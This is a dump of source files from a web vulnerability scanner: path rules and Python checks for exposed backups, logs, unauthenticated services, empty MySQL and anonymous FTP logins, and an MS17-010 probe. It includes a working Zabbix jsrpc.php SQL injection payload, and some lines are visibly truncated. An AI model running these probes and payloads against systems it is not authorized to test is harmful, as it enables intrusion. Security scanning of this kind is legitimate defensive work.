--------------------------------------------------------------------------------
/rules/web_editors.txt:
--------------------------------------------------------------------------------
1 |
2 | # Web Editors
3 | /fckeditor/_samples/default.html {tag="FCKeditor"} {type="html"} {root_only}
4 | /ckeditor/samples/ {tag="CKEditor Samples "} {root_only}
5 | /editor/ckeditor/samples/ {tag="CKEditor Samples "} {root_only}
6 | /ckeditor/samples/sample_posteddata.php {tag="http://ckeditor.com "} {root_only}
7 | /editor/ckeditor/samples/sample_posteddata.php {tag="http://ckeditor.com"} {root_only}
8 | /fck/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php {status=200} {type="html"} {tag="init_spell()"} {root_only}
9 | /fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellcheckder.php {status=200} {type="html"} {tag="init_spell()"} {root_only}
10 |
11 |
12 | # ueditor SSRF
13 | #/ueditor/ueditor.config.js {status=200} {tag="/php/getRemoteImage.php"} {root_only}
14 | /ueditor/php/getRemoteImage.php {tag="'tip':'"} {status=200} {root_only}
15 |
16 |
--------------------------------------------------------------------------------
/rules/white.list:
--------------------------------------------------------------------------------
1 | # text to search in doc
2 | # regex can be used
3 |
4 | # 匹配的条目将被立即标记命中
5 |
6 |
7 | {text="
Index of"}
8 |
9 | {text="phpMyAdmin "}
10 |
11 | {text="allow_url_fopen"}
12 |
13 | {text="MemAdmin"}
14 |
15 | {text="This is the default start page for the Resin server"}
16 |
17 | {text="Apache Tomcat"}
18 |
19 | {text="request_uri"}
20 |
21 | {text="Login to Cacti "}
22 |
23 | {text="Zabbix "}
24 |
25 | {text="Dashboard [Jenkins]"}
26 |
27 | {text="Graphite Browser"}
28 |
29 | {text="'/app/kibana'"}
30 |
31 | {text="http://www.atlassian.com/software/jira"}
32 |
33 | {regex_text=" on line "}
56 |
57 | {text="The proxy server could not handle the request"}
58 |
59 | {regex_text=".*后台.* "}
60 |
61 |
62 | {regex_text=".*Swagger UI.* "}
63 |
64 | {regex_text=".*管理.* "}
65 |
66 | {regex_text="*.background.* "}
67 |
--------------------------------------------------------------------------------
/rules/zabbix_jsrpc_sqli.txt:
--------------------------------------------------------------------------------
1 | # Zabbix SQLi
2 |
3 | /zabbix/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get&tamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=1zabbix/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get&tim%20estamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=hi%20story.php&profileIdx=web.item.graph&profileIdx2=(select%201%20from%20(select%20count(*),concat(floor(rand(0)*2),%20user())x%20from%20information_schema.character_sets%20group%20by%20x)y)&updateProfil%20e=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=%2017&itemids%5B23297%5D=23297&action=showlatest&filter=&filter_task=&%20mark_color=1 {tag="Duplicate entry"} {status=200} {type="text/plain"} {root_only}
4 |
5 | /jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get&stamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=1zabbix/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get&tim%20estamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=hi%20story.php&profileIdx=web.item.graph&profileIdx2=(select%201%20from%20(select%20count(*),concat(floor(rand(0)*2),%20user())x%20from%20information_schema.character_sets%20group%20by%20x)y)&updateProfil%20e=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=%2017&itemids%5B23297%5D=23297&action=showlatest&filter=&filter_task=&%20mark_color=1 {tag="Duplicate entry"} {status=200} {type="text/plain"} {root_only}
6 |
7 |
--------------------------------------------------------------------------------
/scripts/__init__.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python3
2 | # -*- coding:utf-8 -*-
3 | # @Author : yhy
4 |
--------------------------------------------------------------------------------
/scripts/disabled/.gitignore:
--------------------------------------------------------------------------------
1 | # Byte-compiled / optimized / DLL files
2 | __pycache__/
3 | *.py[cod]
4 |
5 | # C extensions
6 | *.so
7 |
8 | # Distribution / packaging
9 | .Python
10 | env/
11 | build/
12 | develop-eggs/
13 | dist/
14 | downloads/
15 | eggs/
16 | .eggs/
17 | lib64/
18 | parts/
19 | sdist/
20 | var/
21 | *.egg-info/
22 | .installed.cfg
23 | *.egg
24 | .idea/
25 |
26 | # PyInstaller
27 | # Usually these files are written by a python script from a template
28 | # before PyInstaller builds the exe, so as to inject date/other infos into it.
29 | *.manifest
30 | *.spec
31 |
32 | # Installer logs
33 | pip-log.txt
34 | pip-delete-this-directory.txt
35 |
36 | # Unit test / coverage reports
37 | htmlcov/
38 | .tox/
39 | .coverage
40 | .coverage.*
41 | .cache
42 | nosetests.xml
43 | coverage.xml
44 | *,cover
45 |
46 | # Translations
47 | *.mo
48 | *.pot
49 |
50 | # Django stuff:
51 | *.log
52 |
53 | # Sphinx documentation
54 | docs/_build/
55 |
56 | # PyBuilder
57 | target/
58 | *.html
59 |
--------------------------------------------------------------------------------
/scripts/disabled/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/olist213/SScan/a8e1e5e71a07080b382bbbc36941e26cc9faf71c/scripts/disabled/__init__.py
--------------------------------------------------------------------------------
/scripts/disabled/smb_ms17010.py:
--------------------------------------------------------------------------------
1 | # @Author : helit
2 |
3 | import socket
4 | import binascii
5 | from lib.common import save_script_result
6 |
7 | ports_to_check = 445
8 |
9 |
10 | def get_tree_connect_request(ip, tree_id):
11 | ipc = "005c5c" + binascii.hexlify(ip) + "5c49504324003f3f3f3f3f00"
12 | ipc_len_hex = hex(len(ipc) / 2).replace("0x", "")
13 | smb = "ff534d4275000000001801280000000000000000000000000000729c" + binascii.hexlify(
14 | tree_id) + "c4e104ff00000000000100" + ipc_len_hex + "00" + ipc
15 | tree = "000000" + hex(len(smb) / 2).replace("0x", "") + smb
16 | tree_connect_request = binascii.unhexlify(tree)
17 | return tree_connect_request
18 |
19 |
20 | def do_check(self, url):
21 | if url != '/' or 445 not in self.ports_open:
22 | return
23 |
24 | ip = self.host.split(':')[0]
25 | port = 445
26 |
27 | timeout = 5
28 | negotiate_protocol_request = binascii.unhexlify(
29 | "00000054ff534d4272000000001801280000000000000000000000000000729c0000c4e1003100024c414e4d414e312e3000024c4d312"
30 | "e325830303200024e54204c414e4d414e20312e3000024e54204c4d20302e313200")
31 | session_setup_request = binascii.unhexlify(
32 | "0000008fff534d4273000000001801280000000000000000000000000000729c0000c4e10cff000000dfff02000100000000003100000"
33 | "00000d400008054004e544c4d5353500001000000050208a2010001002000000010001000210000002e3431426c7441314e5059746249"
34 | "55473057696e646f7773203230303020323139350057696e646f7773203230303020352e3000")
35 | try:
36 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
37 | s.settimeout(timeout)
38 | s.connect((ip, port))
39 | s.send(negotiate_protocol_request)
40 | s.recv(1024)
41 | s.send(session_setup_request)
42 | data = s.recv(1024)
43 | user_id = data[32:34]
44 | session_setup_request_2 = binascii.unhexlify(
45 | "00000150ff534d4273000000001801280000000000000000000000000000729c" + binascii.hexlify(
46 | user_id) + "c4e10cff000000dfff0200010000000000f200000000005cd0008015014e544c4d535350000300000018001800"
47 | "40000000780078005800000002000200d000000000000000d200000020002000d200000000000000f200000005"
48 | "0208a2ec893eacfc70bba9afefe94ef78908d37597e0202fd6177c0dfa65ed233b731faf86b02110137dc50101"
49 | "000000000000004724eed7b8d2017597e0202fd6177c0000000002000a0056004b002d005000430001000a0056"
50 | "004b002d005000430004000a0056004b002d005000430003000a0056004b002d00500043000700080036494bf1"
51 | "d7b8d20100000000000000002e003400310042006c007400410031004e00500059007400620049005500470030"
52 | "0057696e646f7773203230303020323139350057696e646f7773203230303020352e3000")
53 | s.send(session_setup_request_2)
54 | s.recv(1024)
55 | session_setup_request_3 = binascii.unhexlify(
56 | "00000063ff534d4273000000001801200000000000000000000000000000729c0000c4e10dff000000dfff0200010000000000000"
57 | "0000000000000400000002600002e0057696e646f7773203230303020323139350057696e646f7773203230303020352e3000")
58 | s.send(session_setup_request_3)
59 | data = s.recv(1024)
60 | tree_id = data[32:34]
61 | smb = get_tree_connect_request(ip, tree_id)
62 | s.send(smb)
63 | s.recv(1024)
64 | poc = binascii.unhexlify(
65 | "0000004aff534d422500000000180128000000000000000000000000" + binascii.hexlify(
66 | user_id) + "729c" + binascii.hexlify(
67 | tree_id) + "c4e11000000000ffffffff0000000000000000000000004a0000004a0002002300000007005c504950455c00")
68 | s.send(poc)
69 | data = s.recv(1024)
70 | s.close()
71 | if "\x05\x02\x00\xc0" in data:
72 | save_script_result(self, '', ip + ':445', '', 'MS17010 SMB Remote Code Execution')
73 | except Exception as e:
74 | return False
75 |
--------------------------------------------------------------------------------
/scripts/discuz_backup_file.py:
--------------------------------------------------------------------------------
1 | from lib.common.utils import save_script_result
2 |
3 |
4 | def do_check(self, url):
5 | if url == '/' and self.session:
6 | if self.index_status == 301 and self.index_headers.get('location', '').find('forum.php') >= 0 or \
7 | str(self.index_headers).find('_saltkey=') > 0:
8 |
9 | url_lst = ['/config/config_ucenter.php.bak',
10 | '/config/.config_ucenter.php.swp',
11 | '/config/.config_global.php.swp',
12 | '/config/config_global.php.1',
13 | '/uc_server/data/config.inc.php.bak',
14 | '/config/config_global.php.bak',
15 | '/include/config.inc.php.tmp']
16 |
17 | for _url in url_lst:
18 | status, headers, html_doc = self.http_request(_url)
19 | if status == 200 or status == 206:
20 | if html_doc.find('= 0:
21 | save_script_result(self, status, self.base_url + _url, 'Discuz Backup File Found')
22 |
23 | # getcolor DOM XSS
24 | status, headers, html_doc = self.http_request('/static/image/admincp/getcolor.htm')
25 | if html_doc.find("if(fun) eval('parent.'+fun+'") > 0:
26 | save_script_result(self, status, self.base_url + '/static/image/admincp/getcolor.htm',
27 | '', 'Discuz getcolor DOM XSS')
28 |
--------------------------------------------------------------------------------
/scripts/is_admin_site.py:
--------------------------------------------------------------------------------
1 | from lib.common.utils import save_script_result
2 |
3 |
4 | def do_check(self, url):
5 | if url == '/':
6 | if self.session and self.index_status in (301, 302):
7 | for keyword in ['admin', 'login', 'manage', 'backend']:
8 | if self.index_headers.get('location', '').find(keyword) >= 0:
9 | save_script_result(self, self.index_status, self.base_url + '/', 'Admin Site')
10 | break
11 |
--------------------------------------------------------------------------------
/scripts/kong_admin_rest_api.py:
--------------------------------------------------------------------------------
1 | # -*- encoding: utf-8 -*-
2 |
3 | from lib.common.utils import save_script_result
4 | import requests
5 |
6 |
7 | ports_to_check = 8001 # 默认服务端口
8 |
9 |
10 | def do_check(self, url):
11 | if url != '/':
12 | return
13 |
14 | if self.session and self.index_headers.get('Server', '').startswith('kong/'):
15 | save_script_result(self, '200', self.base_url, 'Kong Admin Rest API')
16 |
17 | if self.port == 8001: # 如果已经维护了 8001 端口的 HTTP连接池,上面的逻辑已经完成扫描
18 | return
19 |
20 | if 8001 not in self.ports_open: # 如果8001端口不开放
21 | return
22 |
23 | # 如果输入的是一个非标准端口的HTTP服务
24 | # 那么,需要单独对8001端口进行检测
25 |
26 | resp = requests.get('http://%s:8001/' % self.host)
27 | headers = resp.headers
28 | if headers.get('Server', '').startswith('kong/'):
29 | save_script_result(self, resp.status_code, 'http://%s:8001' % self.host, 'Kong Admin Rest API')
30 |
--------------------------------------------------------------------------------
/scripts/log_files.py:
--------------------------------------------------------------------------------
1 | # Logs
2 | # /access.log {status=206} {type="application/octet-stream"} {root_only}
3 | # /error.log {status=206} {type="application/octet-stream"} {root_only}
4 | # /log/access.log {status=206} {type="application/octet-stream"} {root_only}
5 | # /log/error.log {status=206} {type="application/octet-stream"} {root_only}
6 | # /log/log.log {status=206} {type="application/octet-stream"} {root_only}
7 | # /logs/error.log {status=206} {type="application/octet-stream"} {root_only}
8 | # /logs/access.log {status=206} {type="application/octet-stream"} {root_only}
9 | # /errors.log {status=206} {type="application/octet-stream"} {root_only}
10 | # /debug.log {status=206} {type="application/octet-stream"} {root_only}
11 | # /db.log {status=206} {type="application/octet-stream"} {root_only}
12 |
13 | # /log.txt {status=200} {type="text/plain"}
14 | # /log.tar.gz {status=206} {type="application/octet-stream"} {root_only}
15 | # /log.rar {status=206} {type="application/octet-stream"} {root_only}
16 | # /log.zip {status=206} {type="application/octet-stream"} {root_only}
17 | # /log.tgz {status=206} {type="application/octet-stream"} {root_only}
18 | # /log.tar.bz2 {status=206} {type="application/octet-stream"} {root_only}
19 | # /log.7z {status=206} {type="application/octet-stream"} {root_only}
20 |
21 | from lib.common.utils import save_script_result
22 |
23 |
24 | def do_check(self, url):
25 | if url == '/' and self.session:
26 | folders = ['']
27 | for log_folder in ['log', 'logs', '_log', '_logs', 'accesslog', 'errorlog']:
28 | status, headers, html_doc = self.http_request('/' + log_folder)
29 |
30 | if status in (301, 302):
31 | location = headers.get('location', '')
32 | if location.startswith(self.base_url + '/' + log_folder + '/') or \
33 | location.startswith('/' + log_folder + '/'):
34 | folders.append(log_folder)
35 | self.enqueue(log_folder)
36 | self.crawl('/' + log_folder + '/')
37 |
38 | if status == 206 and self._404_status != 206:
39 | save_script_result(self, status, self.base_url + '/' + log_folder, '',
40 | 'Log File Found')
41 |
42 | url_lst = ['access.log', 'www.log', 'error.log', 'log.log', 'sql.log',
43 | 'errors.log', 'debug.log', 'db.log', 'install.log',
44 | 'server.log', 'sqlnet.log', 'WS_FTP.log', 'database.log', 'data.log', 'app.log',
45 | 'log.tar.gz', 'log.rar', 'log.zip',
46 | 'log.tgz', 'log.tar.bz2', 'log.7z']
47 |
48 | for log_folder in folders:
49 | for _url in url_lst:
50 | url_prefix = '/' + log_folder if log_folder else ''
51 | status, headers, html_doc = self.http_request(url_prefix + '/' + _url)
52 | # print '/' + log_folder + '/' + _url
53 | if status == 206 and \
54 | (self._404_status == 404 or headers.get('content-type', '').find('application/') >= 0):
55 | save_script_result(self, status, self.base_url + url_prefix + '/' + _url,
56 | '', 'Log File')
57 |
58 | for log_folder in folders:
59 | for _url in ['log.txt', 'logs.txt']:
60 | url_prefix = '/' + log_folder if log_folder else ''
61 | status, headers, html_doc = self.http_request(url_prefix + '/' + _url)
62 | # print '/' + log_folder + '/' + _url
63 | if status == 206 and headers.get('content-type', '').find('text/plain') >= 0:
64 | save_script_result(self, status, self.base_url + url_prefix + '/' + _url,
65 | '', 'Log File')
66 |
--------------------------------------------------------------------------------
/scripts/mysql_Empty_pwd.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python3
2 | # -*- coding:utf-8 -*-
3 | # @Author : yhy
4 |
5 | # mysql空口令
6 |
7 | import pymysql
8 | from lib.common.utils import save_script_result
9 |
10 |
11 | ports_to_check = 3306 # 默认扫描端口
12 |
13 |
14 | def do_check(self, url):
15 | if url != '/':
16 | return
17 | port = 3306
18 | if self.scheme == 'mysql' and self.port != 3306: # 非标准端口
19 | port = self.port
20 | elif 3306 not in self.ports_open:
21 | return
22 |
23 | try:
24 | conn = pymysql.connect(host=self.host, user='root', password='', charset='utf8', autocommit=True)
25 | conn.close()
26 | save_script_result(self, '', 'mysql://%s:%s' % (self.host, port), '', 'Mysql empty password')
27 | except Exception as e:
28 | pass
29 |
--------------------------------------------------------------------------------
/scripts/outlook_web_app.py:
--------------------------------------------------------------------------------
1 | # Outlook Web APP
2 |
3 | import http.client
4 | from lib.common.utils import save_script_result
5 |
6 |
7 | def do_check(self, url):
8 | if url == '/' and self.session:
9 | if self.index_status == 302 and self.index_headers.get('location', '').lower() == 'https://%s/owa' % self.host:
10 | save_script_result(self, 302, 'https://%s' % self.host, 'OutLook Web APP Found')
11 | return
12 |
13 | status, headers, html_doc = self.http_request('/ews/')
14 |
15 | if status == 302:
16 | redirect_url = headers.get('location', '')
17 | if redirect_url == 'https://%shttp://%s/ews/' % (self.host, self.host):
18 | save_script_result(self, 302, 'https://%s' % self.host, 'OutLook Web APP Found')
19 | return
20 | if redirect_url == 'https://%s/ews/' % self.host:
21 | try:
22 | conn = http.client.HTTPSConnection(self.host)
23 | conn.request('HEAD', '/ews')
24 | if conn.getresponse().status == 401:
25 | save_script_result(self, 401, redirect_url, 'OutLook Web APP Found')
26 | conn.close()
27 | except Exception as e:
28 | pass
29 | return
30 |
31 | elif status == 401:
32 | if headers.get('Server', '').find('Microsoft-IIS') >= 0:
33 | save_script_result(self, 401, self.base_url + '/ews/', 'OutLook Web APP Found')
34 | return
35 |
--------------------------------------------------------------------------------
/scripts/readme.txt:
--------------------------------------------------------------------------------
1 |
2 | 请将你编写的脚本置于这个文件夹中
3 |
4 | Place your scripts in this folder
5 |
6 |
--------------------------------------------------------------------------------
/scripts/scan_by_hostname_or_folder.py:
--------------------------------------------------------------------------------
1 | # /{hostname_or_folder}.zip {status=206} {type="application/"} {root_only}
2 | # /{hostname_or_folder}.rar {status=206} {type="application/"} {root_only}
3 | # /{hostname_or_folder}.tar.gz {status=206} {type="application/"} {root_only}
4 | # /{hostname_or_folder}.tar.bz2 {status=206} {type="application/"} {root_only}
5 | # /{hostname_or_folder}.tgz {status=206} {type="application/"} {root_only}
6 | # /{hostname_or_folder}.7z {status=206} {type="application/"} {root_only}
7 | # /{hostname_or_folder}.log {status=206} {type="application/"} {root_only}
8 | #
9 | # /{sub}.zip {status=206} {type="application/"} {root_only}
10 | # /{sub}.rar {status=206} {type="application/"} {root_only}
11 | # /{sub}.tar.gz {status=206} {type="application/"} {root_only}
12 | # /{sub}.tar.bz2 {status=206} {type="application/"} {root_only}
13 | # /{sub}.tgz {status=206} {type="application/"} {root_only}
14 | # /{sub}.7z {status=206} {type="application/"} {root_only}
15 | #
16 | # /../{hostname_or_folder}.zip {status=206} {type="application/"}
17 | # /../{hostname_or_folder}.rar {status=206} {type="application/"}
18 | # /../{hostname_or_folder}.tar.gz {status=206} {type="application/"}
19 | # /../{hostname_or_folder}.tar.bz2 {status=206} {type="application/"}
20 | # /../{hostname_or_folder}.tgz {status=206} {type="application/"}
21 | # /../{hostname_or_folder}.7z {status=206} {type="application/"}
22 | # /../{hostname_or_folder}.log {status=206} {type="application/"}
23 |
24 |
25 | from lib.common.utils import save_script_result
26 |
27 |
28 | def do_check(self, url):
29 | if not self.session:
30 | return
31 | extensions = ['.zip', '.rar', '.tar.gz', '.tar.bz2', '.tgz', '.7z', '.log', '.sql']
32 |
33 | if url == '/' and self.domain_sub:
34 | file_names = [self.host.split(':')[0], self.domain_sub]
35 | for name in file_names:
36 | for ext in extensions:
37 | status, headers, html_doc = self.http_request('/' + name + ext)
38 | if status == 206 and \
39 | (self._404_status == 404 or headers.get('content-type', '').find('application/') >= 0) or \
40 | (ext == '.sql' and html_doc.find("CREATE TABLE") >= 0):
41 | save_script_result(self, status, self.base_url + '/' + name + ext,
42 | '', 'Compressed File')
43 |
44 | elif url != '/':
45 | # sub folders like /aaa/bbb/
46 | folder_name = url.split('/')[-2]
47 | if len(folder_name) >= 4:
48 | url_prefix = url[: -len(folder_name) - 1]
49 | for ext in extensions:
50 | status, headers, html_doc = self.http_request(url_prefix + folder_name + ext)
51 | if status == 206 and headers.get('content-type', '').find('application/') >= 0:
52 | save_script_result(self, status, self.base_url + url_prefix + folder_name + ext,
53 | '', 'Compressed File')
54 |
--------------------------------------------------------------------------------
/scripts/sensitive_folders.py:
--------------------------------------------------------------------------------
1 | from lib.common.utils import save_script_result
2 |
3 | folders = """
4 | /admin
5 | /bak
6 | /backup
7 | /conf
8 | /config
9 | /db
10 | /debug
11 | /data
12 | /database
13 | /deploy
14 | /WEB-INF
15 | /install
16 | /manage
17 | /manager
18 | /monitor
19 | /tmp
20 | /temp
21 | /test
22 | """
23 |
24 |
25 | def do_check(self, url):
26 | if url != '/' or not self.session or self._404_status == 301:
27 | return
28 |
29 | _folders = folders.split()
30 |
31 | for _url in _folders:
32 | if not _url:
33 | continue
34 | status, headers, html_doc = self.http_request(_url)
35 |
36 | if status in (301, 302):
37 | location = headers.get('location', '')
38 | if location.startswith(self.base_url + _url + '/') or location.startswith(_url + '/'):
39 | # save_user_script_result(self, status, self.base_url + _url,
40 | # '', 'Possible Sensitive Folder Found')
41 | self.enqueue(_url + '/')
42 | self.crawl(_url + '/')
43 |
44 | if status == 206 and self._404_status != 206:
45 | save_script_result(self, status, self.base_url + _url,
46 | '', 'Possible Sensitive File Found')
47 |
--------------------------------------------------------------------------------
/scripts/tools/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/olist213/SScan/a8e1e5e71a07080b382bbbc36941e26cc9faf71c/scripts/tools/__init__.py
--------------------------------------------------------------------------------
/scripts/tools/port_scan.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- encoding: utf-8 -*-
3 | # ports_to_check 设置为 想要扫描的1个或多个端口
4 | # python BBScan.py --scripts-only --script port_scan --host www.baidu.com --network 16 --save-ports ports_80.txt
5 |
6 | ports_to_check = [80]
7 |
8 |
9 | def do_check(self, url):
10 | pass
--------------------------------------------------------------------------------
/scripts/unauthorized_access_CouchDB.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python3
2 | # -*- coding:utf-8 -*-
3 | # @Author : yhy
4 |
5 | # CouchDB 未授权访问
6 |
7 | import requests
8 | from lib.common.utils import save_script_result
9 | from config.setting import default_headers
10 |
11 | ports_to_check = 5984 # 默认扫描端口
12 |
13 |
14 | def do_check(self, url):
15 | if url != '/':
16 | return
17 | port = 5984
18 | if self.scheme == 'CouchDB' and self.port != 5984: # 非标准端口
19 | port = self.port
20 | elif 5984 not in self.ports_open:
21 | return
22 |
23 | try:
24 | url = 'http://' + self.host + ':' + str(port) + '/_utils/'
25 | r = requests.get(url, timeout=5, verify=False, headers=default_headers)
26 | if 'couchdb-logo' in r.content.decode():
27 | save_script_result(self, '', 'http://%s:%s/_utils/' % (self.host, port), 'CouchDB Unauthorized Accesss')
28 | except Exception as e:
29 | pass
30 |
31 |
--------------------------------------------------------------------------------
/scripts/unauthorized_access_Hadoop.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python3
2 | # -*- coding:utf-8 -*-
3 | # @Author : yhy
4 |
5 | # Hadoop 未授权访问
6 |
7 | import requests
8 | from lib.common.utils import save_script_result
9 | from config.setting import default_headers
10 |
11 | ports_to_check = 50070 # 默认扫描端口
12 |
13 |
14 | def do_check(self, url):
15 | if url != '/':
16 | return
17 | port = 50070
18 | if self.scheme == 'Hadoop' and self.port != 50070: # 非标准端口
19 | port = self.port
20 | elif 50070 not in self.ports_open:
21 | return
22 |
23 | try:
24 | url = 'http://' + self.host + ':' + str(port) + '/dfshealth.html'
25 | r = requests.get(url, timeout=5, verify=False, headers = default_headers)
26 | if 'hadoop.css' in r.content.decode():
27 | save_script_result(self, '', 'http://%s:%s/dfshealth.html' % (self.host, port), 'Hadoop Unauthorized Accesss')
28 | except Exception as e:
29 | pass
30 |
31 |
--------------------------------------------------------------------------------
/scripts/unauthorized_access_Hadoop_yarn.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python3
2 | # -*- coding:utf-8 -*-
3 | # @Author : yhy
4 |
5 | # Hadoop yarn 未授权访问
6 |
7 | import requests
8 | from lib.common.utils import save_script_result
9 | from config.setting import default_headers
10 |
11 | ports_to_check = 8088 # 默认扫描端口
12 |
13 |
14 | def do_check(self, url):
15 | if url != '/':
16 | return
17 | port = 8088
18 | if self.scheme == 'Hadoop yarn' and self.port != 8088: # 非标准端口
19 | port = self.port
20 | elif 8088 not in self.ports_open:
21 | return
22 |
23 | try:
24 | url = 'http://' + self.host + ':' + str(port) + '/ws/v1/cluster/info'
25 | r = requests.get(url, timeout=5, verify=False, headers = default_headers)
26 | if 'resourceManagerVersionBuiltOn' in r.content.decode() or 'hadoopVersion'in r.content.decode():
27 | save_script_result(self, '', 'http://%s:%s/ws/v1/cluster/info' % (self.host, port), 'Hadoop yarn Unauthorized Accesss')
28 | except Exception as e:
29 | pass
30 |
31 |
--------------------------------------------------------------------------------
/scripts/unauthorized_access_docker.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python3
2 | # -*- coding:utf-8 -*-
3 | # @Author : yhy
4 |
5 | # docker api 未授权访问
6 |
7 | import requests
8 | from lib.common.utils import save_script_result
9 | from config.setting import default_headers
10 |
11 | ports_to_check = 2375 # 默认扫描端口
12 |
13 |
14 | def do_check(self, url):
15 | if url != '/':
16 | return
17 | port = 2375
18 | if self.scheme == 'docker api' and self.port != 2375: # 非标准端口
19 | port = self.port
20 | elif 2375 not in self.ports_open:
21 | return
22 |
23 | try:
24 | url = 'http://' + self.host + ':' + str(port) + '/version'
25 | r = requests.get(url, timeout=5, verify=False, headers = default_headers)
26 | if 'ApiVersion' in r.content.decode():
27 | save_script_result(self, '', 'http://%s:%s/version' % (self.host, port), 'docker api Unauthorized Accesss')
28 | except Exception as e:
29 | pass
30 |
31 |
--------------------------------------------------------------------------------
/scripts/unauthorized_access_docker_registry_api.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python3
2 | # -*- coding:utf-8 -*-
3 | # @Author : yhy
4 |
5 | # docker registry api 未授权访问
6 |
7 | import requests
8 | from lib.common.utils import save_script_result
9 |
10 | ports_to_check = 30000 # 默认扫描端口
11 |
12 |
13 | def do_check(self, url):
14 | if url != '/':
15 | return
16 | port = 30000
17 | if self.scheme == 'docker api' and self.port != 30000: # 非标准端口
18 | port = self.port
19 | elif 30000 not in self.ports_open:
20 | return
21 |
22 | try:
23 | r0 = requests.get(f"http://{self.host}:{port}/v2/_catalog", timeout=5, verify=False)
24 |
25 | if "repositories" in r0.text:
26 | save_script_result(self, '', 'http://%s:%s/v2/_catalog' % (self.host, port), 'docker registry api Unauthorized Accesss')
27 | return
28 | r = requests.get(f"http://{self.host}:{port}/v1/_catalog", timeout=5, verify=False)
29 | if "repositories" in r.text:
30 | save_script_result(self, '', 'http://%s:%s/v1/_catalog' % (self.host, port), 'docker registry api Unauthorized Accesss')
31 | return
32 |
33 | except Exception as e:
34 | pass
35 |
36 |
37 |
--------------------------------------------------------------------------------
/scripts/unauthorized_access_elasticsearch.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python3
2 | # -*- coding:utf-8 -*-
3 | # @Author : yhy
4 |
5 | # elasticsearch 未授权访问
6 |
7 | import requests
8 | from lib.common.utils import save_script_result
9 |
10 |
11 | ports_to_check = 9200 # 默认扫描端口
12 |
13 |
14 | def do_check(self, url):
15 | if url != '/':
16 | return
17 | port = 9200
18 | if self.scheme == 'elasticsearch' and self.port != 9200: # 非标准端口
19 | port = self.port
20 | elif 9200 not in self.ports_open:
21 | return
22 | try:
23 | url = 'http://' + self.host + ':' + str(port) + '/_cat'
24 | r = requests.get(url, timeout=5)
25 | if '/_cat/master' in r.content.decode():
26 | save_script_result(self, '', 'http://%s:%s/_cat' % (self.host, port), 'Elasticsearch Unauthorized Accesss')
27 | except Exception as e:
28 | pass
29 |
--------------------------------------------------------------------------------
/scripts/unauthorized_access_ftp.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python3
2 | # -*- coding:utf-8 -*-
3 | # @Author : yhy
4 |
5 | # FTP 未授权访问
6 |
7 | import ftplib
8 | from lib.common.utils import save_script_result
9 |
10 | ports_to_check = 21 # 默认扫描端口
11 |
12 |
13 | def do_check(self, url):
14 | if url != '/':
15 | return
16 | port = 21
17 | if self.scheme == 'ftp' and self.port != 21: # 非标准端口
18 | port = self.port
19 | elif 21 not in self.ports_open:
20 | return
21 |
22 | try:
23 | ftp = ftplib.FTP()
24 | ftp.connect(self.host, port, timeout=5) # 连接的ftp sever和端口
25 | ftp.login('anonymous', 'Aa@12345678')
26 | save_script_result(self, '', 'ftp://%s:%s/' % (self.host, port), 'FTP Unauthorized Accesss')
27 | except Exception as e:
28 | pass
29 |
30 |
--------------------------------------------------------------------------------
/scripts/unauthorized_access_jboss.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python3
2 | # -*- coding:utf-8 -*-
3 | # @Author : yhy
4 |
5 | # JBoss 未授权访问
6 |
7 | import requests
8 | from lib.common.utils import save_script_result
9 |
10 | ports_to_check = 8080 # 默认扫描端口
11 |
12 |
13 | def do_check(self, url):
14 | if url != '/':
15 | return
16 | port = 8080
17 | if self.scheme == 'jenkins' and self.port != 8080: # 非标准端口
18 | port = self.port
19 | elif 8080 not in self.ports_open:
20 | return
21 | try:
22 | url = 'http://' + self.host + ':' + str(port) + '/jmx-console/HtmlAdaptor?action=displayMBeans'
23 | r = requests.get(url, timeout=5)
24 | if 'JBoss JMX Management Console' in r.content.decode() and r.status_code == 200 and 'jboss' in r.content.decode():
25 | save_script_result(self, '', 'http://%s:%s/jmx-console/HtmlAdaptor?action=displayMBeans' % (self.host, port), 'JBoss Unauthorized Accesss')
26 | except Exception as e:
27 | pass
28 |
--------------------------------------------------------------------------------
/scripts/unauthorized_access_jenkins.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python3
2 | # -*- coding:utf-8 -*-
3 | # @Author : yhy
4 |
5 | # jenkins 未授权访问
6 |
7 | import requests
8 | from lib.common.utils import save_script_result
9 |
10 |
11 | ports_to_check = 8080 # 默认扫描端口
12 |
13 |
14 | def do_check(self, url):
15 | if url != '/':
16 | return
17 | port = 8080
18 | if self.scheme == 'jenkins' and self.port != 8080: # 非标准端口
19 | port = self.port
20 | elif 8080 not in self.ports_open:
21 | return
22 | try:
23 | url = 'http://' + self.host + ':' + str(port) + '/systemInfo'
24 | r = requests.get(url, timeout=5)
25 | if 'jenkins.war' in r.content.decode() and 'JENKINS_HOME' in r.content.decode():
26 | save_script_result(self, '', 'http://%s:%s/systemInfo' % (self.host, port), 'jenkins Unauthorized Accesss')
27 | except Exception as e:
28 | pass
29 |
--------------------------------------------------------------------------------
